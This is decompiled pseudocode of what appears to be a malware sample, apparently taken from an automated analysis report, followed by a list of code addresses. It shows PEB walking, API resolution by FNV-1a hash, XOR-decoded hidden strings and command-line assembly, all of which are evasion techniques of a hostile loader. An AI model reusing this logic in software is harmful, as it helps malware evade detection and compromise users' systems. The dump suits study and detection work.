																											_v112 = _v112 - 1;
																											if(_v1920 == 0) {
																												goto L234;
																											}
																											_v1924 = _v400 +  *((intOrPtr*)(_v400 +  *((intOrPtr*)(_v396 + 0x20)) + _v112 * 4));
																											_v612 = _v1924;
																											_v616 = 0x811c9dc5;
																											while(1) {
																												_v58 =  *_v612;
																												_v612 = _v612 + 1;
																												_v16 = _v58;
																												if(_v16 == 0) {
																													break;
																												}
																												_v616 = (_v16 ^ _v616) * 0x1000193;
																											}
																											_v1928 = _v616;
																											if(_v1928 != 0x411c4d3) {
																												continue;
																											}
																											_v1936 = _v400 +  *((intOrPtr*)(_v396 + 0x1c));
																											_v1932 = _v400 +  *((intOrPtr*)(_v396 + 0x24));
																											_v1940 = _v400 +  *((intOrPtr*)(_v1936 + ( *(_v1932 + _v112 * 2) & 0x0000ffff) * 4));
																											_v624 = _v1940;
																											L236:
																											_v1956 =  &_v1952;
																											_v1968 =  *_v1956;
																											_v1964 =  &_v1960;
																											_v1972 =  *_v1964;
																											_v624(_v1972, _v1968);
																											_v2024 =  &_v4120;
																											_v2032 =  &_v9260;
																											_v640 = _v2440;
																											_v1976 =  *[fs:0x30];
																											_v1980 =  *((intOrPtr*)(_v1976 + 0xc));
																											_v1984 =  *((intOrPtr*)(_v1980 + 0xc));
																											_v636 = _v1984;
																											do {
																												_v216 =  *((intOrPtr*)(_v636 + 0x18));
																												_v412 = _v216;
																												_v1988 = _v216 +  *((intOrPtr*)(_v216 + 0x3c));
																												_t3347 = _v1988;
																												_v2276 =  *((intOrPtr*)(_t3347 + 0x78));
																												_v2272 =  *((intOrPtr*)(_t3347 + 0x7c));
																												_v408 = _v216 + _v2276;
																												_v404 = _v2272;
																												if(_v408 == _v412) {
																													_v784 = 0;
																												} else {
																													_v784 = 1;
																												}
																												_v60 = _v784;
																												if((_v60 & 0x000000ff) == 0) {
																													goto L250;
																												}
																												_v116 =  *((intOrPtr*)(_v408 + 0x18));
																												while(1) {
																													_v1992 = _v116;
																													_v116 = _v116 - 1;
																													if(_v1992 == 0) {
																														goto L250;
																													}
																													_v1996 = _v412 +  *((intOrPtr*)(_v412 +  *((intOrPtr*)(_v408 + 0x20)) + _v116 * 4));
																													_v628 = _v1996;
																													_v632 = 0x811c9dc5;
																													while(1) {
																														_v61 =  *_v628;
																														_v628 = _v628 + 1;
																														_v17 = _v61;
																														if(_v17 == 0) {
																															break;
																														}
																														_v632 = (_v17 ^ _v632) * 0x1000193;
																													}
																													_v2000 = _v632;
																													if(_v2000 != 0x411c4d3) {
																														continue;
																													}
																													_v2008 = _v412 +  *((intOrPtr*)(_v408 + 0x1c));
																													_v2004 = _v412 +  *((intOrPtr*)(_v408 + 0x24));
																													_v2012 = _v412 +  *((intOrPtr*)(_v2008 + ( *(_v2004 + _v116 * 2) & 0x0000ffff) * 4));
																													_v640 = _v2012;
																													L252:
																													_v2028 =  &_v2024;
																													_v2040 =  *_v2028;
																													_v2036 =  &_v2032;
																													_v2044 =  *_v2036;
																													_v640(_v2044, _v2040);
																													_v2096 = "\"";
																													_v2104 =  &_v9260;
																													_v656 = _v2444;
																													_v2048 =  *[fs:0x30];
																													_v2052 =  *((intOrPtr*)(_v2048 + 0xc));
																													_v2056 =  *((intOrPtr*)(_v2052 + 0xc));
																													_v652 = _v2056;
																													do {
																														_v204 =  *((intOrPtr*)(_v652 + 0x18));
																														_v424 = _v204;
																														_v2060 = _v204 +  *((intOrPtr*)(_v204 + 0x3c));
																														_t2888 = _v2060;
																														_v2284 =  *((intOrPtr*)(_t2888 + 0x78));
																														_v2280 =  *((intOrPtr*)(_t2888 + 0x7c));
																														_v420 = _v204 + _v2284;
																														_v416 = _v2280;
																														if(_v420 == _v424) {
																															_v788 = 0;
																														} else {
																															_v788 = 1;
																														}
																														_v63 = _v788;
																														if((_v63 & 0x000000ff) == 0) {
																															goto L266;
																														}
																														_v120 =  *((intOrPtr*)(_v420 + 0x18));
																														while(1) {
																															_v2064 = _v120;
																															_v120 = _v120 - 1;
																															if(_v2064 == 0) {
																																goto L266;
																															}
																															_v2068 = _v424 +  *((intOrPtr*)(_v424 +  *((intOrPtr*)(_v420 + 0x20)) + _v120 * 4));
																															_v644 = _v2068;
																															_v648 = 0x811c9dc5;
																															while(1) {
																																_v64 =  *_v644;
																																_v644 = _v644 + 1;
																																_v18 = _v64;
																																if(_v18 == 0) {
																																	break;
																																}
																																_v648 = (_v18 ^ _v648) * 0x1000193;
																															}
																															_v2072 = _v648;
																															if(_v2072 != 0x411c4d3) {
																																continue;
																															}
																															_v2080 = _v424 +  *((intOrPtr*)(_v420 + 0x1c));
																															_v2076 = _v424 +  *((intOrPtr*)(_v420 + 0x24));
																															_v2084 = _v424 +  *((intOrPtr*)(_v2080 + ( *(_v2076 + _v120 * 2) & 0x0000ffff) * 4));
																															_v656 = _v2084;
																															L268:
																															_v2100 =  &_v2096;
																															_v2112 =  *_v2100;
																															_v2108 =  &_v2104;
																															_v2116 =  *_v2108;
																															_v656(_v2116, _v2112);
																															_v2420 =  &_v5160;
																															_v66 = 0;
																															_v128 = E6E414A40( &_v66,  &_v2876);
																															_v124 = 0;
																															while(_v124 < 0x1e) {
																																_v2120 =  &(_v128[2]);
																																_v2124 = _v2120 + _v124 * 2;
																																_v430 =  *_v2124 & 0x0000ffff ^  *_v128;
																																_v2128 =  &(_v128[2]);
																																_v2132 = _v2128 + _v124 * 2;
																																 *_v2132 = _v430;
																																_v124 = _v124 + 1;
																															}
																															_v2136 =  &(_v128[2]);
																															_v2140 = _v2136 + (0x1e << 1);
																															 *_v2140 = 0;
																															_v2144 =  &(_v128[2]);
																															_v2416 = _v2144;
																															_v67 = 0;
																															_v136 = E6E412710( &_v67,  &_v2694);
																															_v132 = 0;
																															while(_v132 < 0x14) {
																																_v2148 =  &(_v136[2]);
																																_v2152 = _v2148 + _v132 * 2;
																																_v428 =  *_v2152 & 0x0000ffff ^  *_v136;
																																_v2156 =  &(_v136[2]);
																																_v2160 = _v2156 + _v132 * 2;
																																 *_v2160 = _v428;
																																_v132 = _v132 + 1;
																															}
																															_v2164 =  &(_v136[2]);
																															_v2168 = _v2164 + (0x14 << 1);
																															 *_v2168 = 0;
																															_v2172 =  &(_v136[2]);
																															_v2412 = _v2172;
																															_v2408 =  &_v9260;
																															_v2404 = 1;
																															_v2400 = 0;
																															return E6E41A7D0( &_v2420);
																														}
																														L266:
																														_v2088 = _v652;
																														_v2092 =  *_v2088;
																														_v652 = _v2092;
																														_v65 = 1;
																													} while ((_v65 & 0x000000ff) != 0);
																													_v656 = 0;
																													goto L268;
																												}
																												L250:
																												_v2016 = _v636;
																												_v2020 =  *_v2016;
																												_v636 = _v2020;
																												_v62 = 1;
																											} while ((_v62 & 0x000000ff) != 0);
																											_v640 = 0;
																											goto L252;
																										}
																										L234:
																										_v1944 = _v620;
																										_v1948 =  *_v1944;
																										_v620 = _v1948;
																										_v59 = 1;
																									} while ((_v59 & 0x000000ff) != 0);
																									_v624 = 0;
																									goto L236;
																								}
																								L218:
																								_v1872 = _v604;
																								_v1876 =  *_v1872;
																								_v604 = _v1876;
																								_v56 = 1;
																							} while ((_v56 & 0x000000ff) != 0);
																							_v608 = 0;
																							goto L220;
																						}
																						L198:
																						_v1772 = _v588;
																						_v1776 =  *_v1772;
																						_v588 = _v1776;
																						_v53 = 1;
																					} while ((_v53 & 0x000000ff) != 0);
																					_v592 = 0;
																					goto L200;
																				}
																				_v657 = 0;
																				_v712 = 0x40;
																				_v711 = 0;
																				_v710 = 0x6d;
																				_v708 = 0x2e;
																				_v706 = 0x60;
																				_v704 = 0x6d;
																				_v702 = 0x29;
																				_v700 = 0x7a;
																				_v698 = 0x62;
																				_v696 = 0;
																				_v874 = _v712;
																				_v870 = _v708;
																				_v866 = _v704;
																				_v862 = _v700;
																				_v858 = _v696;
																				_v184 = 0;
																				while(_v184 < 7) {
																					_v1232 =  &_v872;
																					_v1236 = _v1232 + _v184 * 2;
																					_v670 =  *_v1236 & 0x0000ffff ^ _v874;
																					_v1240 =  &_v872;
																					_v1244 = _v1240 + _v184 * 2;
																					 *_v1244 = _v670;
																					_v184 = _v184 + 1;
																				}
																				_v1248 =  &_v872;
																				_v1252 = (7 << 1) + _v1248;
																				 *_v1252 = 0;
																				_v1256 =  &_v872;
																				_v1308 = _v1256;
																				_v1316 =  &_v9260;
																				_v512 = _v2464;
																				_v1260 =  *[fs:0x30];
																				_v1264 =  *((intOrPtr*)(_v1260 + 0xc));
																				_v1268 =  *((intOrPtr*)(_v1264 + 0xc));
																				_v508 = _v1268;
																				do {
																					_v236 =  *((intOrPtr*)(_v508 + 0x18));
																					_v328 = _v236;
																					_v1272 = _v236 +  *((intOrPtr*)(_v236 + 0x3c));
																					_t3472 = _v1272;
																					_v2212 =  *((intOrPtr*)(_t3472 + 0x78));
																					_v2208 =  *((intOrPtr*)(_t3472 + 0x7c));
																					_v324 = _v236 + _v2212;
																					_v320 = _v2208;
																					if(_v324 == _v328) {
																						_v748 = 0;
																					} else {
																						_v748 = 1;
																					}
																					_v34 = _v748;
																					if((_v34 & 0x000000ff) != 0) {
																						_v188 =  *((intOrPtr*)(_v324 + 0x18));
																						while(1) {
																							_v1276 = _v188;
																							_v188 = _v188 - 1;
																							if(_v1276 == 0) {
																								goto L100;
																							}
																							_v1280 = _v328 +  *((intOrPtr*)(_v328 +  *((intOrPtr*)(_v324 + 0x20)) + _v188 * 4));
																							_v500 = _v1280;
																							_v504 = 0x811c9dc5;
																							while(1) {
																								_v35 =  *_v500;
																								_v500 = _v500 + 1;
																								_v9 = _v35;
																								if(_v9 == 0) {
																									break;
																								}
																								_v504 = (_v9 ^ _v504) * 0x1000193;
																							}
																							_v1284 = _v504;
																							if(_v1284 != 0x7e1a2725) {
																								continue;
																							}
																							_v1292 = _v328 +  *((intOrPtr*)(_v324 + 0x1c));
																							_v1288 = _v328 +  *((intOrPtr*)(_v324 + 0x24));
																							_v1296 = _v328 +  *((intOrPtr*)(_v1292 + ( *(_v1288 + _v188 * 2) & 0x0000ffff) * 4));
																							_v512 = _v1296;
																							L102:
																							_v1312 =  &_v1308;
																							_v1324 =  *_v1312;
																							_v1320 =  &_v1316;
																							_v1328 =  *_v1320;
																							_v512(_v1328, _v1324);
																							_v658 = 0;
																							_v828 = 0x26;
																							_v827 = 0;
																							_v826 = 0x73;
																							_v824 = 0x56;
																							_v822 = 0x42;
																							_v820 = 0x47;
																							_v818 = 0x52;
																							_v816 = 0x43;
																							_v814 = 0x407;
																							_v812 = 0x4e;
																							_v810 = 0x43;
																							_v808 = 0x45;
																							_v806 = 0x4d;
																							_v804 = 0;
																							memcpy( &_v2502,  &_v828, 6 << 2);
																							asm("movsw");
																							_v192 = 0;
																							while(_v192 < 0xb) {
																								_v1332 =  &_v2500;
																								_v1336 = _v1332 + _v192 * 2;
																								_v672 =  *_v1336 & 0x0000ffff ^ _v2502;
																								_v1340 =  &_v2500;
																								_v1344 = _v1340 + _v192 * 2;
																								 *_v1344 = _v672;
																								_v192 = _v192 + 1;
																							}
																							_v1348 =  &_v2500;
																							_v1352 = (0xb << 1) + _v1348;
																							 *_v1352 = 0;
																							_v1356 =  &_v2500;
																							_v1408 = _v1356;
																							_v1416 =  &_v9260;
																							_v528 = _v2468;
																							_v1360 =  *[fs:0x30];
																							_v1364 =  *((intOrPtr*)(_v1360 + 0xc));
																							_v1368 =  *((intOrPtr*)(_v1364 + 0xc));
																							_v524 = _v1368;
																							do {
																								_v240 =  *((intOrPtr*)(_v524 + 0x18));
																								_v340 = _v240;
																								_v1372 = _v240 +  *((intOrPtr*)(_v240 + 0x3c));
																								_t3493 = _v1372;
																								_v2220 =  *((intOrPtr*)(_t3493 + 0x78));
																								_v2216 =  *((intOrPtr*)(_t3493 + 0x7c));
																								_v336 = _v240 + _v2220;
																								_v332 = _v2216;
																								if(_v336 == _v340) {
																									_v760 = 0;
																								} else {
																									_v760 = 1;
																								}
																								_v37 = _v760;
																								if((_v37 & 0x000000ff) == 0) {
																									goto L120;
																								}
																								_v196 =  *((intOrPtr*)(_v336 + 0x18));
																								while(1) {
																									_v1376 = _v196;
																									_v196 = _v196 - 1;
																									if(_v1376 == 0) {
																										goto L120;
																									}
																									_v1380 = _v340 +  *((intOrPtr*)(_v340 +  *((intOrPtr*)(_v336 + 0x20)) + _v196 * 4));
																									_v516 = _v1380;
																									_v520 = 0x811c9dc5;
																									while(1) {
																										_v38 =  *_v516;
																										_v516 = _v516 + 1;
																										_v10 = _v38;
																										if(_v10 == 0) {
																											break;
																										}
																										_v520 = (_v10 ^ _v520) * 0x1000193;
																									}
																									_v1384 = _v520;
																									if(_v1384 != 0x411c4d3) {
																										continue;
																									}
																									_v1392 = _v340 +  *((intOrPtr*)(_v336 + 0x1c));
																									_v1388 = _v340 +  *((intOrPtr*)(_v336 + 0x24));
																									_v1396 = _v340 +  *((intOrPtr*)(_v1392 + ( *(_v1388 + _v196 * 2) & 0x0000ffff) * 4));
																									_v528 = _v1396;
																									L122:
																									_v1412 =  &_v1408;
																									_v1424 =  *_v1412;
																									_v1420 =  &_v1416;
																									_v1428 =  *_v1420;
																									_v528(_v1428, _v1424);
																									_v1480 = L"\" \"";
																									_v1488 =  &_v9260;
																									_v544 = _v2472;
																									_v1432 =  *[fs:0x30];
																									_v1436 =  *((intOrPtr*)(_v1432 + 0xc));
																									_v1440 =  *((intOrPtr*)(_v1436 + 0xc));
																									_v540 = _v1440;
																									do {
																										_v244 =  *((intOrPtr*)(_v540 + 0x18));
																										_v268 = _v244;
																										_v1444 = _v244 +  *((intOrPtr*)(_v244 + 0x3c));
																										_t3033 = _v1444;
																										_v2228 =  *((intOrPtr*)(_t3033 + 0x78));
																										_v2224 =  *((intOrPtr*)(_t3033 + 0x7c));
																										_v264 = _v244 + _v2228;
																										_v260 = _v2224;
																										if(_v264 == _v268) {
																											_v756 = 0;
																										} else {
																											_v756 = 1;
																										}
																										_v40 = _v756;
																										if((_v40 & 0x000000ff) == 0) {
																											goto L136;
																										}
																										_v200 =  *((intOrPtr*)(_v264 + 0x18));
																										while(1) {
																											_v1448 = _v200;
																											_v200 = _v200 - 1;
																											if(_v1448 == 0) {
																												goto L136;
																											}
																											_v1452 = _v268 +  *((intOrPtr*)(_v268 +  *((intOrPtr*)(_v264 + 0x20)) + _v200 * 4));
																											_v532 = _v1452;
																											_v536 = 0x811c9dc5;
																											while(1) {
																												_v41 =  *_v532;
																												_v532 = _v532 + 1;
																												_v11 = _v41;
																												if(_v11 == 0) {
																													break;
																												}
																												_v536 = (_v11 ^ _v536) * 0x1000193;
																											}
																											_v1456 = _v536;
																											if(_v1456 != 0x411c4d3) {
																												continue;
																											}
																											_v1464 = _v268 +  *((intOrPtr*)(_v264 + 0x1c));
																											_v1460 = _v268 +  *((intOrPtr*)(_v264 + 0x24));
																											_v1468 = _v268 +  *((intOrPtr*)(_v1464 + ( *(_v1460 + _v200 * 2) & 0x0000ffff) * 4));
																											_v544 = _v1468;
																											L138:
																											_v1484 =  &_v1480;
																											_v1496 =  *_v1484;
																											_v1492 =  &_v1488;
																											_v1500 =  *_v1492;
																											_v544(_v1500, _v1496);
																											_v1552 =  &_v4120;
																											_v1560 =  &_v9260;
																											_v560 = _v2476;
																											_v1504 =  *[fs:0x30];
																											_v1508 =  *((intOrPtr*)(_v1504 + 0xc));
																											_v1512 =  *((intOrPtr*)(_v1508 + 0xc));
																											_v556 = _v1512;
																											do {
																												_v248 =  *((intOrPtr*)(_v556 + 0x18));
																												_v352 = _v248;
																												_v1516 = _v248 +  *((intOrPtr*)(_v248 + 0x3c));
																												_t3519 = _v1516;
																												_v2236 =  *((intOrPtr*)(_t3519 + 0x78));
																												_v2232 =  *((intOrPtr*)(_t3519 + 0x7c));
																												_v348 = _v248 + _v2236;
																												_v344 = _v2232;
																												if(_v348 == _v352) {
																													_v764 = 0;
																												} else {
																													_v764 = 1;
																												}
																												_v43 = _v764;
																												if((_v43 & 0x000000ff) == 0) {
																													goto L152;
																												}
																												_v72 =  *((intOrPtr*)(_v348 + 0x18));
																												while(1) {
																													_v1520 = _v72;
																													_v72 = _v72 - 1;
																													if(_v1520 == 0) {
																														goto L152;
																													}
																													_v1524 = _v352 +  *((intOrPtr*)(_v352 +  *((intOrPtr*)(_v348 + 0x20)) + _v72 * 4));
																													_v548 = _v1524;
																													_v552 = 0x811c9dc5;
																													while(1) {
																														_v44 =  *_v548;
																														_v548 = _v548 + 1;
																														_v12 = _v44;
																														if(_v12 == 0) {
																															break;
																														}
																														_v552 = (_v12 ^ _v552) * 0x1000193;
																													}
																													_v1528 = _v552;
																													if(_v1528 != 0x411c4d3) {
																														continue;
																													}
																													_v1536 = _v352 +  *((intOrPtr*)(_v348 + 0x1c));
																													_v1532 = _v352 +  *((intOrPtr*)(_v348 + 0x24));
																													_v1540 = _v352 +  *((intOrPtr*)(_v1536 + ( *(_v1532 + _v72 * 2) & 0x0000ffff) * 4));
																													_v560 = _v1540;
																													L154:
																													_v1556 =  &_v1552;
																													_v1568 =  *_v1556;
																													_v1564 =  &_v1560;
																													_v1572 =  *_v1564;
																													_v560(_v1572, _v1568);
																													_v1624 = "\"";
																													_v1632 =  &_v9260;
																													_v576 = _v2424;
																													_v1576 =  *[fs:0x30];
																													_v1580 =  *((intOrPtr*)(_v1576 + 0xc));
																													_v1584 =  *((intOrPtr*)(_v1580 + 0xc));
																													_v572 = _v1584;
																													do {
																														_v252 =  *((intOrPtr*)(_v572 + 0x18));
																														_v364 = _v252;
																														_v1588 = _v252 +  *((intOrPtr*)(_v252 + 0x3c));
																														_t3059 = _v1588;
																														_v2244 =  *((intOrPtr*)(_t3059 + 0x78));
																														_v2240 =  *((intOrPtr*)(_t3059 + 0x7c));
																														_v360 = _v252 + _v2244;
																														_v356 = _v2240;
																														if(_v360 == _v364) {
																															_v768 = 0;
																														} else {
																															_v768 = 1;
																														}
																														_v46 = _v768;
																														if((_v46 & 0x000000ff) == 0) {
																															goto L168;
																														}
																														_v76 =  *((intOrPtr*)(_v360 + 0x18));
																														while(1) {
																															_v1592 = _v76;
																															_v76 = _v76 - 1;
																															if(_v1592 == 0) {
																																goto L168;
																															}
																															_v1596 = _v364 +  *((intOrPtr*)(_v364 +  *((intOrPtr*)(_v360 + 0x20)) + _v76 * 4));
																															_v564 = _v1596;
																															_v568 = 0x811c9dc5;
																															while(1) {
																																_v47 =  *_v564;
																																_v564 = _v564 + 1;
																																_v13 = _v47;
																																if(_v13 == 0) {
																																	break;
																																}
																																_v568 = (_v13 ^ _v568) * 0x1000193;
																															}
																															_v1600 = _v568;
																															if(_v1600 != 0x411c4d3) {
																																continue;
																															}
																															_v1608 = _v364 +  *((intOrPtr*)(_v360 + 0x1c));
																															_v1604 = _v364 +  *((intOrPtr*)(_v360 + 0x24));
																															_v1612 = _v364 +  *((intOrPtr*)(_v1608 + ( *(_v1604 + _v76 * 2) & 0x0000ffff) * 4));
																															_v576 = _v1612;
																															L170:
																															_v1628 =  &_v1624;
																															_v1640 =  *_v1628;
																															_v1636 =  &_v1632;
																															_v1644 =  *_v1636;
																															_v576(_v1644, _v1640);
																															_v2396 =  &_v5160;
																															_v49 = 0;
																															_v84 = E6E414900( &_v49,  &_v2812);
																															_v80 = 0;
																															while(_v80 < 0x1e) {
																																_v1648 =  &(_v84[2]);
																																_v1652 = _v1648 + _v80 * 2;
																																_v674 =  *_v1652 & 0x0000ffff ^  *_v84;
																																_v1656 =  &(_v84[2]);
																																_v1660 = _v1656 + _v80 * 2;
																																 *_v1660 = _v674;
																																_v80 = _v80 + 1;
																															}
																															_v1664 =  &(_v84[2]);
																															_v1668 = _v1664 + (0x1e << 1);
																															 *_v1668 = 0;
																															_v1672 =  &(_v84[2]);
																															_v2392 = _v1672;
																															_v50 = 0;
																															_v92 = E6E4128C0( &_v50,  &_v2650);
																															_v88 = 0;
																															while(_v88 < 0x14) {
																																_v1676 =  &(_v92[2]);
																																_v1680 = _v1676 + _v88 * 2;
																																_v676 =  *_v1680 & 0x0000ffff ^  *_v92;
																																_v1684 =  &(_v92[2]);
																																_v1688 = _v1684 + _v88 * 2;
																																 *_v1688 = _v676;
																																_v88 = _v88 + 1;
																															}
																															_v1692 =  &(_v92[2]);
																															_v1696 = _v1692 + (0x14 << 1);
																															 *_v1696 = 0;
																															_v1700 =  &(_v92[2]);
																															_v2388 = _v1700;
																															_v2384 =  &_v9260;
																															_v2380 = 1;
																															_v2376 = 0;
																															return E6E41A7D0( &_v2396);
																														}
																														L168:
																														_v1616 = _v572;
																														_v1620 =  *_v1616;
																														_v572 = _v1620;
																														_v48 = 1;
																													} while ((_v48 & 0x000000ff) != 0);
																													_v576 = 0;
																													goto L170;
																												}
																												L152:
																												_v1544 = _v556;
																												_v1548 =  *_v1544;
																												_v556 = _v1548;
																												_v45 = 1;
																											} while ((_v45 & 0x000000ff) != 0);
																											_v560 = 0;
																											goto L154;
																										}
																										L136:
																										_v1472 = _v540;
																										_v1476 =  *_v1472;
																										_v540 = _v1476;
																										_v42 = 1;
																									} while ((_v42 & 0x000000ff) != 0);
																									_v544 = 0;
																									goto L138;
																								}
																								L120:
																								_v1400 = _v524;
																								_v1404 =  *_v1400;
																								_v524 = _v1404;
																								_v39 = 1;
																							} while ((_v39 & 0x000000ff) != 0);
																							_v528 = 0;
																							goto L122;
																						}
																					}
																					L100:
																					_v1300 = _v508;
																					_v1304 =  *_v1300;
																					_v508 = _v1304;
																					_v36 = 1;
																				} while ((_v36 & 0x000000ff) != 0);
																				_v512 = 0;
																				goto L102;
																			}
																			goto L75;
																		}
																	}
																	L79:
																	_v1200 = _v492;
																	_v1204 =  *_v1200;
																	_v492 = _v1204;
																	_v33 = 1;
																} while ((_v33 & 0x000000ff) != 0);
																_v496 = 0;
																goto L81;
															}
															goto L55;
														}
													}
													L59:
													_v1100 = _v476;
													_v1104 =  *_v1100;
													_v476 = _v1104;
													_v30 = 1;
												} while ((_v30 & 0x000000ff) != 0);
												_v480 = 0;
												goto L61;
											}
											goto L38;
										}
									}
									L42:
									_v1028 = _v460;
									_v1032 =  *_v1028;
									_v460 = _v1032;
									_v27 = 1;
								} while ((_v27 & 0x000000ff) != 0);
								_v464 = 0;
								goto L44;
							}
							goto L22;
						}
					}
					L26:
					_v956 = _v444;
					_v960 =  *_v956;
					_v444 = _v960;
					_v24 = 1;
				} while ((_v24 & 0x000000ff) != 0);
				_v448 = 0;
				goto L28;
			}

0x6e41aac8
0x6e41aada
0x6e41aaea
0x6e41aafa
0x6e41ab01
0x6e41ab10
0x6e41ab25
0x6e41ab2b
0x6e41ab46
0x6e41ab58
0x6e41ab6d
0x6e41ab87
0x6e41ab97
0x6e41abac
0x6e41abbf
0x6e41ab40
0x6e41ab40
0x6e41abd0
0x6e41abe3
0x6e41abf1
0x6e41abfd
0x6e41ac09
0x6e41ac22
0x6e41ac2a
0x6e41ac39
0x6e41ac4e
0x6e41ac54
0x6e41ac6f
0x6e41ac81
0x6e41ac96
0x6e41acb0
0x6e41acc0
0x6e41acd5
0x6e41ace8
0x6e41ac69
0x6e41ac69
0x6e41acf9
0x6e41ad0c
0x6e41ad1a
0x6e41ad26
0x6e41ad32
0x6e41ad4b
0x6e41ad53
0x6e41ad62
0x6e41ad77
0x6e41ad7d
0x6e41ad98
0x6e41adaa
0x6e41adbf
0x6e41add9
0x6e41ade9
0x6e41adfe
0x6e41ae11
0x6e41ad92
0x6e41ad92
0x6e41ae22
0x6e41ae35
0x6e41ae43
0x6e41ae4f
0x6e41ae5b
0x6e41ae74
0x6e41ae80
0x6e41ae8c
0x6e41ae98
0x6e41aea4
0x6e41aeb3
0x6e41aec2
0x6e41aece
0x6e41aed4
0x6e41aedd
0x6e41aee9
0x6e41aefe
0x6e41af0c
0x6e41af1a
0x6e41af20
0x6e41af32
0x6e41af3e
0x6e41af50
0x6e41af5e
0x6e41af52
0x6e41af52
0x6e41af52
0x6e41af6e
0x6e41af77
0x6e41af86
0x6e41af8c
0x6e41af92
0x6e41afa1
0x6e41afae
0x00000000
0x00000000
0x6e41afd2
0x6e41afde
0x6e41afe4
0x6e41afee
0x6e41aff6
0x6e41b002
0x6e41b00b
0x6e41b014
0x00000000
0x00000000
0x6e41b024
0x6e41b035
0x6e41b035
0x6e41b01c
0x6e41b047
0x00000000
0x6e41b049
0x6e41b058
0x6e41b06d
0x6e41b092
0x6e41b09e
0x6e41b0eb
0x6e41b0f1
0x6e41b0ff
0x6e41b10b
0x6e41b119
0x6e41b12d
0x6e41b133
0x6e41b143
0x6e41b14f
0x6e41b15b
0x6e41b16a
0x6e41b179
0x6e41b185
0x6e41b18b
0x6e41b194
0x6e41b1a0
0x6e41b1b5
0x6e41b1c3
0x6e41b1d1
0x6e41b1d7
0x6e41b1e9
0x6e41b1f5
0x6e41b207
0x6e41b215
0x6e41b209
0x6e41b209
0x6e41b209
0x6e41b225
0x6e41b22e
0x6e41b23d
0x6e41b243
0x6e41b249
0x6e41b258
0x6e41b265
0x00000000
0x00000000
0x6e41b289
0x6e41b295
0x6e41b29b
0x6e41b2a5
0x6e41b2ad
0x6e41b2b9
0x6e41b2c2
0x6e41b2cb
0x00000000
0x00000000
0x6e41b2db
0x6e41b2ec
0x6e41b2ec
0x6e41b2d3
0x6e41b2fe
0x00000000
0x6e41b300
0x6e41b30f
0x6e41b324
0x6e41b349
0x6e41b355
0x6e41b3a2
0x6e41b3a8
0x6e41b3b6
0x6e41b3c2
0x6e41b3d0
0x6e41b3dc
0x6e41b3e3
0x6e41b3ec
0x00000000
0x6e41df59
0x6e41b3f8
0x6e41b404
0x6e41b410
0x6e41b41d
0x6e41b42c
0x6e41b43b
0x6e41b447
0x6e41b44d
0x6e41b456
0x6e41b462
0x6e41b477
0x6e41b485
0x6e41b493
0x6e41b499
0x6e41b4ab
0x6e41b4b7
0x6e41b4c9
0x6e41b4d7
0x6e41b4cb
0x6e41b4cb
0x6e41b4cb
0x6e41b4e7
0x6e41b4f0
0x6e41b4ff
0x6e41b505
0x6e41b50b
0x6e41b51a
0x6e41b527
0x00000000
0x00000000
0x6e41b54b
0x6e41b557
0x6e41b55d
0x6e41b567
0x6e41b56f
0x6e41b57b
0x6e41b584
0x6e41b58d
0x00000000
0x00000000
0x6e41b59d
0x6e41b5ae
0x6e41b5ae
0x6e41b595
0x6e41b5c0
0x00000000
0x6e41b5c2
0x6e41b5d1
0x6e41b5e6
0x6e41b60b
0x6e41b617
0x6e41b664
0x6e41b66a
0x6e41b678
0x6e41b684
0x6e41b692
0x6e41b6a6
0x6e41b6ae
0x6e41b6b4
0x6e41b6bd
0x6e41b6c8
0x6e41b6d4
0x6e41b6e0
0x6e41b6ec
0x6e41b6f5
0x6e41b702
0x6e41b70e
0x6e41b71a
0x6e41b720
0x6e41b73b
0x6e41b74a
0x6e41b75f
0x6e41b777
0x6e41b784
0x6e41b799
0x6e41b7ac
0x6e41b735
0x6e41b735
0x6e41b7ba
0x6e41b7cd
0x6e41b7db
0x6e41b7e4
0x6e41b7f0
0x6e41b7fc
0x6e41b808
0x6e41b814
0x6e41b823
0x6e41b832
0x6e41b83e
0x6e41b844
0x6e41b84d
0x6e41b859
0x6e41b86e
0x6e41b87c
0x6e41b88a
0x6e41b890
0x6e41b8a2
0x6e41b8ae
0x6e41b8c0
0x6e41b8ce
0x6e41b8c2
0x6e41b8c2
0x6e41b8c2
0x6e41b8de
0x6e41b8e7
0x6e41b8f6
0x6e41b8fc
0x6e41b902
0x6e41b911
0x6e41b91e
0x00000000
0x00000000
0x6e41b942
0x6e41b94e
0x6e41b954
0x6e41b95e
0x6e41b966
0x6e41b972
0x6e41b97b
0x6e41b984
0x00000000
0x00000000
0x6e41b994
0x6e41b9a5
0x6e41b9a5
0x6e41b98c
0x6e41b9b7
0x00000000
0x6e41b9b9
0x6e41b9c8
0x6e41b9dd
0x6e41ba02
0x6e41ba0e
0x6e41ba5b
0x6e41ba61
0x6e41ba6f
0x6e41ba7b
0x6e41ba89
0x6e41ba9d
0x6e41baaa
0x6e41bab8
0x6e41cd2c
0x6e41cd39
0x00000000
0x6e41df53
0x6e41cd41
0x6e41cd47
0x6e41cd50
0x6e41cd5b
0x6e41cd67
0x6e41cd73
0x6e41cd7f
0x6e41cd8b
0x6e41cd97
0x6e41cda3
0x6e41cdac
0x6e41cdb9
0x6e41cdc5
0x6e41cdd1
0x6e41cddd
0x6e41cdea
0x6e41cdf1
0x6e41ce03
0x6e41ce0f
0x6e41ce21
0x6e41ce39
0x6e41ce46
0x6e41ce58
0x6e41ce6b
0x6e41ce00
0x6e41ce00
0x6e41ce76
0x6e41ce89
0x6e41ce97
0x6e41cea0
0x6e41ceac
0x6e41ceb8
0x6e41cec4
0x6e41ced1
0x6e41cee0
0x6e41ceef
0x6e41cefb
0x6e41cf01
0x6e41cf0a
0x6e41cf16
0x6e41cf2b
0x6e41cf39
0x6e41cf47
0x6e41cf4d
0x6e41cf5f
0x6e41cf6b
0x6e41cf7d
0x6e41cf8b
0x6e41cf7f
0x6e41cf7f
0x6e41cf7f
0x6e41cf9b
0x6e41cfa4
0x00000000
0x00000000
0x6e41cfb3
0x6e41cfb6
0x6e41cfb9
0x6e41cfc5
0x6e41cfcf
0x00000000
0x00000000
0x6e41cff0
0x6e41cffc
0x6e41d002
0x6e41d00c
0x6e41d014
0x6e41d020
0x6e41d029
0x6e41d032
0x00000000
0x00000000
0x6e41d053
0x6e41d053
0x6e41d03a
0x6e41d065
0x00000000
0x6e41d0c1
0x6e41d076
0x6e41d08b
0x6e41d0ad
0x6e41d0b9
0x6e41d106
0x6e41d10c
0x6e41d11a
0x6e41d126
0x6e41d134
0x6e41d148
0x6e41d150
0x6e41d156
0x6e41d15f
0x6e41d16a
